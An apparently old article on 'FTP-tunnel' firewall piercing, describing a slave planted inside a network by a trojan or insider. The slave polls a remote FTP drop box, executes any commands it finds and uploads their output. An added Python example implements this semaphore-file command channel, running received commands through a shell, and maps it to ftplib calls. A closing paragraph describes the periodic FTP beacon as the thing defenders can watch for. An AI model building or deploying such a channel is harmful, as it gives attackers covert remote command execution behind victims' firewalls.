FTP-tunnel for Firewall Piercing
Author : Dhiraj Bhuyan
I read about http-tunnel and email-tunnel some hours back, but I did not see anything about FTP, which can be used for the same tunnelling purpose. Many system administrators do allow outbound FTP connections, in which case FTP can be used for a similar "attack from inside". I have written some code to demonstrate this (although I don't think it requires demonstration!). It is written in Perl and Tcl/expect, is very naive, and allows execution of remote commands behind the firewall and then viewing the results.
[ For those who haven't read about http and email tunnels, let me explain this first. Firewalls are meant to protect your network from an outside attack. This is done by refusing connections to requests coming from outside the LAN, etc. But with active cooperation from inside (a trojan that you managed to push in undetected, or maybe the help of a disgruntled employee), one can still bypass the firewall and do things you were not supposed to do from outside. However, you still need to send commands to your slave sitting inside, through the firewall. So people have worked out various ways of doing that. FTP-tunnel is one such attempt. ]
The idea behind ftp-tunnel is that we have a slave running behind the firewall which periodically connects by FTP to a remote machine and looks for a predefined file (where the master has stuffed the instructions to be executed). Once it locates that file, it downloads it, executes the instructions in it, dumps the output to a file and then FTPs back to that same machine to upload the output file, so that the master can view the result. Thus the master, in spite of being blocked by the firewall, is actually bypassing it, over an outbound connection the firewall allows, to do things it was not supposed to do!
To explain how my code works: slave.pl (the one which is helping you from inside) runs on a machine behind the firewall and periodically FTPs to a remote machine and looks for a file "semaphoreA", to see if its master has any request; the absence of the file indicates no request. (A more subtle implementation would do something like scan a web page for keywords.)

On the remote machine, the attacker launches master.pl when he wants to execute some commands remotely. This code asks for the command to be executed, puts it in a file "request" and then makes the semaphoreA file available, so that the slave can see it the next time it polls. It also creates a garbage file semaphoreB, which is used by the slave, and then periodically looks for the file semaphoreC; the moment it sees it, it knows that the slave has the output of the command available in the file "answer".

On the slave side, the moment the slave sees the file semaphoreA on the remote machine, it FTPs the request file and then the semaphoreB file. The main program uses the presence of the semaphoreB file as the indication that a "request" has come. The command is then executed and the output put in the file "answer"; the slave then FTPs the files "answer" and semaphoreC to the remote machine. Note the ordering in both directions: the data file is uploaded before the semaphore that announces it, so the other side never picks up a half-written file.
So here is the code -
master.pl
(perl code)
slave.pl
(perl code - make sure you have the login, passwd and machine name correct here!)
ftp-get
(tcl/expect)
ftp-send
(tcl/expect)
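Since the Perl and expect sources are not reproduced on this page, here is an added example (my own code, not the author's master.pl/slave.pl) of the same semaphoreA/B/C file protocol written in Python. It assumes a small transport interface with four operations (exists, get, put, delete) and implements it against a local directory so it runs offline; the comments say which ftplib calls the same four operations would map to on a real FTP server. One addition not described in the article: the slave deletes semaphoreA after consuming it, so the same request is not re-executed on the next poll. The command and directories used in demo() are constructed for the example.

```python
"""Added example: the ftp-tunnel semaphore-file protocol, offline."""
import os
import subprocess
import tempfile
import time
from pathlib import Path

REQUEST, ANSWER = "request", "answer"
SEM_A, SEM_B, SEM_C = "semaphoreA", "semaphoreB", "semaphoreC"


class DirTransport:
    """Stand-in for the FTP server: a local directory offering the four
    operations the protocol needs. A real transport would implement the same
    four methods with ftplib.FTP.nlst(), retrbinary('RETR ...'),
    storbinary('STOR ...') and delete() (assumption: server permits all four)."""

    def __init__(self, root):
        self.root = Path(root)
        self.root.mkdir(parents=True, exist_ok=True)

    def exists(self, name):
        return (self.root / name).exists()

    def get(self, name):
        return (self.root / name).read_bytes()

    def put(self, name, data):
        (self.root / name).write_bytes(data)

    def delete(self, name):
        (self.root / name).unlink(missing_ok=True)

    def listing(self):
        return sorted(p.name for p in self.root.iterdir())


def master_post(t, command):
    """Master side: publish one command. The payload (request, semaphoreB) is
    uploaded BEFORE semaphoreA, so a slave polling mid-transfer cannot see the
    flag and then read a half-written request."""
    t.delete(SEM_C)                     # clear any stale answer flag
    t.put(REQUEST, command.encode())
    t.put(SEM_B, b"")                   # garbage file the slave hands to its executor
    t.put(SEM_A, b"")                   # flag: request available


def master_wait(t, timeout=5.0, interval=0.05):
    """Master side: poll for semaphoreC, then fetch and return the answer
    (None on timeout)."""
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        if t.exists(SEM_C):
            out = t.get(ANSWER).decode(errors="replace")
            t.delete(SEM_C)
            return out
        time.sleep(interval)
    return None


def slave_poll_once(t, workdir):
    """Slave side: one polling round. Returns True if a request was serviced."""
    if not t.exists(SEM_A):
        return False
    workdir = Path(workdir)
    workdir.mkdir(parents=True, exist_ok=True)
    (workdir / REQUEST).write_bytes(t.get(REQUEST))
    (workdir / SEM_B).write_bytes(t.get(SEM_B))
    t.delete(SEM_A)                     # addition: consume the flag, avoid re-running
    # The local "main program": a semaphoreB file means a request is waiting.
    if (workdir / SEM_B).exists():
        cmd = (workdir / REQUEST).read_text()
        proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        answer = proc.stdout + proc.stderr
        (workdir / ANSWER).write_text(answer)
        (workdir / SEM_B).unlink()
        t.put(ANSWER, answer.encode())  # payload first ...
        t.put(SEM_C, b"")               # ... then the flag announcing it
    return True


def round_trip(dropbox, workdir, command):
    """Drive one full exchange and report what the drop box looks like after."""
    t_master, t_slave = DirTransport(dropbox), DirTransport(dropbox)
    master_post(t_master, command)
    serviced = slave_poll_once(t_slave, workdir)
    answer = master_wait(t_master)
    idle = slave_poll_once(t_slave, workdir)   # nothing pending: must be False
    return {"serviced": serviced, "answer": answer, "idle": idle,
            "leftover": t_master.listing()}


def demo(command="echo hello"):
    """Constructed scenario: master and slave share a temporary drop directory."""
    with tempfile.TemporaryDirectory() as tmp:
        return round_trip(os.path.join(tmp, "drop"), os.path.join(tmp, "slave"), command)


if __name__ == "__main__":
    print(demo())
```

On a real deployment the slave is what generates the observable signal: a host that opens an outbound FTP session on a fixed period and only ever lists, fetches and stores the same handful of file names is exactly the kind of beacon that this "allowed outbound protocol" tunnel relies on administrators not looking for.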
Further Work
There is a suggestion to rewrite the code to make it more of a transport tunnel that allows TCP over FTP. But I do not see much use for ftp-tunnel as a transport tunnel, because of the latency of polling for files, so I am leaving it as it is; curious readers can pursue it further!
Please note that I wrote this piece of code out of sheer academic curiosity. It is not intended to help people break the law. I however take no responsibility for the misuse of this piece of code.
Flames > /dev/null
eGreetings > dbhuyans@yahoo.com
Cheers!